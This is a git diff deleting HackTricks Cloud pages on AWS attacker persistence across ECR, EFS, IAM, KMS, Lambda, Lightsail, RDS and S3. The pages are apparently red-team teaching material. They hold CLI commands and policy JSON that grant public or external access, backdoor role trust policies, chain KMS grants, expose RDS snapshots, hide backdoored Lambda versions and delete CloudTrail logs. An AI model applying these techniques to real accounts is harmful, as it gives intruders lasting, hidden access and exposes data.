-Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
deleted file mode 100644
index cdea71f8d..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ /dev/null
@@ -1,124 +0,0 @@
-# AWS - ECR Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## ECR
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-ecr-enum.md" %}
-[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md)
-{% endcontent-ref %}
-
-### Hidden Docker Image with Malicious Code
-
-An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
-
-### Repository Policy
-
-Add a policy to a single repository granting yourself (or everybody) access to a repository:
-
-```bash
-aws ecr set-repository-policy \
- --repository-name cluster-autoscaler \
- --policy-text file:///tmp/my-policy.json
-
-# With a .json such as
-
-{
- "Version" : "2008-10-17",
- "Statement" : [
- {
- "Sid" : "allow public pull",
- "Effect" : "Allow",
- "Principal" : "*",
- "Action" : [
- "ecr:BatchCheckLayerAvailability",
- "ecr:BatchGetImage",
- "ecr:GetDownloadUrlForLayer"
- ]
- }
- ]
-}
-```
-
-{% hint style="warning" %}
-Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
-{% endhint %}
-
-### Registry Policy & Cross-account Replication
-
-It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
-
-
-
-First, you need to give the external account access over the registry with a **registry policy** like:
-
-```bash
-aws ecr put-registry-policy --policy-text file://my-policy.json
-
-# With a .json like:
-
-{
- "Sid": "asdasd",
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam::947247140022:root"
- },
- "Action": [
- "ecr:CreateRepository",
- "ecr:ReplicateImage"
- ],
- "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
-}
-```
-
-Then apply the replication config:
-
-```bash
-aws ecr put-replication-configuration \
- --replication-configuration file://replication-settings.json \
- --region us-west-2
-
-# Having the .json a content such as:
-{
- "rules": [{
- "destinations": [{
- "region": "destination_region",
- "registryId": "destination_accountId"
- }],
- "repositoryFilters": [{
- "filter": "repository_prefix_name",
- "filterType": "PREFIX_MATCH"
- }]
- }]
-}
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
deleted file mode 100644
index b534c2fd2..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# AWS - EFS Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EFS
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-efs-enum.md" %}
-[aws-efs-enum.md](../aws-services/aws-efs-enum.md)
-{% endcontent-ref %}
-
-### Modify Resource Policy / Security Groups
-
-Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
-
-### Create Access Point
-
-You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md deleted file mode 100644 index accebf399..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md +++ /dev/null @@ -1,78 +0,0 @@ -# AWS - IAM Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### Common IAM Persistence - -* Create a user -* Add a controlled user to a privileged group -* Create access keys (of the new user or of all users) -* Grant extra permissions to controlled users/groups (attached policies or inline policies) -* Disable MFA / Add you own MFA device -* Create a Role Chain Juggling situation (more on this below in STS persistence) - -### Backdoor Role Trust Policies - -You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": [ - "*", - "arn:aws:iam::123213123123:root" - ] - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -### Backdoor Policy Version - -Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. - -### Backdoor / Create Identity Provider - -If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md deleted file mode 100644 index dbf4efa29..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md +++ /dev/null @@ -1,66 +0,0 @@ -# AWS - KMS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For mor information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Grant acces via KMS policies - -An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. - -### Eternal Grant - -Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. - -Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. - -(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) - -```bash -# To generate grants, generate 10 like this one -aws kms create-grant \ - --key-id \ - --grantee-principal \ - --operations "CreateGrant" "Decrypt" - -# To monitor grants -aws kms list-grants --key-id -``` - -{% hint style="info" %} -A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
deleted file mode 100644
index 13f2777a8..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
+++ /dev/null
@@ -1,90 +0,0 @@
-# AWS - Lambda Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Lambda
-
-For more information check:
-
-{% content-ref url="../../aws-services/aws-lambda-enum.md" %}
-[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md)
-{% endcontent-ref %}
-
-### Lambda Layer Persistence
-
-It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
-
-{% content-ref url="aws-lambda-layers-persistence.md" %}
-[aws-lambda-layers-persistence.md](aws-lambda-layers-persistence.md)
-{% endcontent-ref %}
-
-### Lambda Extension Persistence
-
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
-
-{% content-ref url="aws-abusing-lambda-extensions.md" %}
-[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md)
-{% endcontent-ref %}
-
-### Via resource policies
-
-It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
-
-
-
-### Versions, Aliases & Weights
-
-A Lambda can have **different versions** (with different code each version).\
-Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
-This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
-
-
-
-### Version Backdoor + API Gateway
-
-1. Copy the original code of the Lambda
-2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
- 1. Call the API gateway related to the lambda to execute the code
-3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
- 1. This will hide the backdoored code in a previous version
-4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1`
- 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
-5. Select the POST method created and in Actions select **`Deploy API`**
-6. Now, when you **call the function via POST your Backdoor** will be invoked
-
-### Cron/Event actuator
-
-The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
-Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
-
-* Every time a new user is created lambda generates a new user key and send it to the attacker.
-* Every time a new role is created lambda gives assume role permissions to compromised users.
-* Every time new cloudtrail logs are generated, delete/alter them
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
deleted file mode 100644
index aa8a0269f..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
+++ /dev/null
@@ -1,69 +0,0 @@
-# AWS - Abusing Lambda Extensions
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Lambda Extensions - -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. - -* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. - -For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). - -### External Extension for Persistence, Stealing Requests & modifying Requests - -This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) - -It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process\_vm\_readv**” and “**process\_vm\_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. 
**This means that an external extension has full read and write access to Rapid’s heap memory, by design.** - -Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. - -The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. - -

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

-
-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
-
-{% hint style="warning" %}
-By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
-{% endhint %}
-
-Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
-
-

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

-
-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
-
-## References
-
-* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
-* [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
deleted file mode 100644
index 77290eacb..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# AWS - Lightsail Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Lightsail
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-lightsail-enum.md" %}
-[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md)
-{% endcontent-ref %}
-
-### Download Instance SSH keys & DB passwords
-
-They won't be changed probably so just having them is a good option for persistence
-
-### Backdoor Instances
-
-An attacker could get access to the instances and backdoor them:
-
-* Using a traditional **rootkit** for example
-* Adding a new **public SSH key**
-* Expose a port with port knocking with a backdoor
-
-### DNS persistence
-
-If domains are configured:
-
-* Create a subdomain pointing your IP so you will have a **subdomain takeover**
-* Create **SPF** record allowing you to send **emails** from the domain
-* Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
deleted file mode 100644
index 641621662..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
+++ /dev/null
@@ -1,61 +0,0 @@
-# AWS - RDS Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -### Make instance publicly accessible: `rds:ModifyDBInstance` - -An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. - -{% code overflow="wrap" %} -```bash -aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately -``` -{% endcode %} - -### Create an admin user inside the DB - -An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. - -### Make snapshot public - -{% code overflow="wrap" %} -```bash -aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
deleted file mode 100644
index c821dbd6a..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# AWS - S3 Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## S3
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %}
-[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md)
-{% endcontent-ref %}
-
-### KMS Client-Side Encryption
-
-When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
-
-
-
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
-
-### Using S3 ACLs
-
-Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
